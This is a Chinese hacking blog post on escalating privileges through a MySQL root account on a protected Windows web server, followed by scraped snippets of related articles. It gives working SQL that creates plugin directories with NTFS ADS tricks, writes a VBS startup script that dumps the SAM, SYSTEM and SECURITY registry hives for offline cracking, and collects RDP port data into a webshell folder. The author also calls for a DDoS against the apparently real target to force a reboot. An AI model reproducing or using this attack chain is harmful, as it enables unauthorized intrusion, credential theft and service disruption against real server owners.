鸡肋提权之变态root利用
你急有毛用,我电脑没带,怎么搞?
联系了基友adminlm牛看看吧,他说有防护软件啥的,有root,无法UDF,于是我让他去Mof,经历一番周折,知道了,对mof目录也锁定了权限,无法用root导出mof文件到目录。。。卧槽,
由于我无法电脑操作,我又给他提供了一些思路,php无法调用ws组建,试试asp,后来听火龙瘠薄说整个服务器全都是phpweb的站点,。。提权陷入僵局。
后来喝了一杯82年的乐事冷静了一下,最后一招,写启动。。
于是让adminlm测试,他不知道再搞些什么东西,也听不懂我的思路,
。。。。我还是自己来吧。。。。
找个语文课的时间,啪。。,飞出来了。。。
直接上传了一个udf.php,看了下情况
版本大于mysql5.0 dll要导出到mysql.exe目录\lib\plugin ,默认不存在\lib\plugin目录,需要用NTFS ads 引流来创建
- select @@basedir;
- //查找到mysql的目录 这里回显:D:\Huweishen.com\PHPWEB\MySQL Server 5.5
- select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib::$INDEX_ALLOCATION';
- //利用NTFS ADS创建lib目录 注意路径的替换。还有\换成\\
- select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib\\plugin::$INDEX_ALLOCATION';
- //利用NTFS ADS创建plugin目录
这样啊 adminlm来的时候已经创建了 已经存在目录
- File 'D:\Huweishen.com\PHPWEB\MySQL Server 5.5\lib\plugin::$INDEX_ALLOCATION' already exists
导出试试看 估计不行 要不然adminlm、早拿下了
mof我也不测试哦了,估计也是不行 因为这个鸟东西在,护卫神!!
写启动项添加用户我也不测试了 万一上面有什么防护软件直接就阻止了
思路还有的,三行代码导hash,破解。ok
然后有人不服,你破解出来又如何,端口你知道????
哦,我不知道,但是我还是可以查。。。看操作吧
建表:
- create table binghe (cmd text);
好了,我们创建了一个新的表,表名为binghe,表中只存放一个字段,字段名为cmd,为text文本。
在表中插入内容
- insert into binghe values ("set wshshell=createobject (""wscript.shell"" ) " );
插入三行代码导出hash,
Code1=reg save hklm\sam sam.hive
code2=reg save hklm\system ystem.hive
code3=reg save hklm\security security.hive
- insert into binghe values ("b=wshshell.run (""c0de1 & c0de2 & code3"",0) " );
三行代码运行之后会在启动目录生成三个文件,到时候loadfile读取,然后本地破解就可以获得管理密码
那么如何获得端口号??
呵呵,这样来
先找到终端服务对应的pid 并将结果写入(>)shell目录的binghe.txt
- insert into binghe values ("b=wshshell.run (""tasklist /svc | find "termservice">D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
- 注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录
再来,查询端口服务,并将结果追加写入(>>)shell目录的binghe.txt
- insert into binghe values ("b=wshshell.run (""netstat -ano>>D:/wwwroot/adpcd.com/include/binghe.txt"",0) ");
- 注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录
看看我在shell上面的实际操作
s这里打了性感的马赛克
来查一下是不是写进去了??
- select * from binghe;
如图,哈哈,不错
好了,一切完毕 开始导出到启动项
- select * from binghe into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\binghe.vbs";
再来loadfile看看
应该写进去了
接下来的事就不是我的事情了
@火龙,交给你,你不是说你的朋友有多少多少G纯流量吗,狠狠地ddos,打到管理员他喊叔叔也不停,然后他就去重启服务器了,然后。。你懂得!
还是说下吧,重启之后,按照我的预想,会在D:/wwwroot/adpcd.com/include/这个目录下生成一个Binghe.txt(内容包括termservice进程服务的pid和端口细节及对应pid,会提权的人都知道这两个pid对比就会获得终端端口号) ,另外在启动目录会生成三个hash的文件,到时候你来找我,我去loadfile他的hash,命令如下:
- select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe1.txt'
- select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe2.txt'
- select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe3.txt'
- 注:file1\file2\file3 分别为三个hash文件
额,这是最后的思路了,比较鸡肋。。。
静待重启吧,时间问题。。
另外谢谢adminlm大牛帮我测试,好机油,下次去找你玩哈
另外说一句,谁对我好我对谁好,火龙大哥帮过我不少,他有问题我当倾力解决。。。不说了,我该回去了 卧槽 还要FQ进去。。别举报我!
鸡肋提权之变态root利用的更多相关文章
- 小白日记25:kali渗透测试之提权(五)--利用配置不当提权
利用配置不当提权 与漏洞提权相比,更常见的方法.在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵.当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行 ...
- 小白日记24:kali渗透测试之提权(四)--利用漏洞提权
利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一.实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/librar ...
- android ioctl fuzz,android 本地提权漏洞 android root
目前正在研究android 三方设备驱动 fuzzer , 也就是下图所说的 ioctl fuzzing, 下图是由keen team nforest 大神发布: 欢迎正在研究此方面的人联系我共同交流 ...
- 一次绕过防火墙获取RCE以及提权到root权限的渗透过程
本文是关于Apache struts2 CVE-2013-2251是由于导致执行远程命令的影响而被高度利用的漏洞.简而言之, 通过操纵以“action:”/”redirect:”/”redirectA ...
- msf利用- windows内核提权漏洞
windows内核提权漏洞 环境: Kali Linux(攻击机) 192.168.190.141 Windows2003SP2(靶机) 192.168.190.147 0x01寻找可利用的exp 实 ...
- WINDOWS渗透与提权总结(1)
旁站路径问题: 1.读网站配置. 2.用以下VBS: 01 On Error Resume Next 02 03 If (LCase(Right(WScript.Fullname, 11)) = ...
- webshell提权20种思路
1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限)2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接 ...
- kali权限提升之配置不当提权与WCE
kali权限提升之配置不当提权与WCE 1.利用配置不当提权 2.WCE 3.其他提权 一.利用配置不当提权 与漏洞提权相比更常用的方法 在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏 ...
- Meterpreter提权详解
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpr ...
随机推荐
- 开始使用 Vuejs 2.0 ---简单总结1
Vue.js(读音 /vjuː/, 类似于 view) 是一套构建用户界面的 渐进式框架.与其他重量级框架不同的是,Vuejs 采用自底向上增量开发的设计.Vuejs 的核心库只关注视图层,并且非常容 ...
- oracle 树状结构递归 PL/SQL输出控制 包括空格输出控制
树状结构 存储过程中通过递归构建,类似BBS回帖显示,代码共三段: 建表,插入数据,创建存储过程显示: 1.create table article(id number primary key,con ...
- Service , DAO ,DBUTtil;
Service , DAO ,DBUTtil; util一般为基本的数据库操作:打开,关闭数据库连接,查询和更新操作. service 调用 dao 实现业务操作 dao层设计要为service服务, ...
- XML的基本概念和Android下的使用
1. XML的基本概念 1. 什么是XML: 1). XML是指可扩展标记语言(eXtensible Markup Language),它是一种标记语言,很类似HTML.它被设计的宗旨是表示数据,而非 ...
- JS实现最小生成树之普里姆(Prim)算法
最小生成树: 我们把构造连通网的最小代价生成树称为最小生成树.经典的算法有两种,普利姆算法和克鲁斯卡尔算法. 普里姆算法打印最小生成树: 先选择一个点,把该顶点的边加入数组,再按照权值最小的原则选边, ...
- [javaSE] IO流(对象序列化)
写入 获取ObjectOutputStream对象,new出来,构造参数:FileOutputStream对象目标文件 调用ObjectOutputStream对象的writeObject()方法,参 ...
- 6 springboot Docker 部署
安装请参考其他的教程请参考http://www.runoob.com/docker/centos-docker-install.htm 拉取zookeeper镜像 docker pull zookee ...
- POJ 1789(最小生成树)
这题要把给的字符串变成边的权值 #include <cstdio> #include <iostream> #include <queue> #include &l ...
- javascript之url转义escape()、encodeURI()和decodeURI(),ifram父子传参参数有中文时出现乱码
ifram父子传参参数有中文时出现乱码,可先在父级页面用encodeURI转义,在到子页面用进行decodeURI()解码 我们可以知道:escape()除了 ASCII 字母.数字和特定的符号外,对 ...
- html开发那些不好的习惯,和问题。
最近网上看了好多html开发中那些问题和不好的习惯,顺手总结一下. 一.上下间距 在开发中你会发现你明明设置的两个p标签上下间距为20px但你实际测量中会发现他会多4~8px,这是为什么呢!如果你是老 ...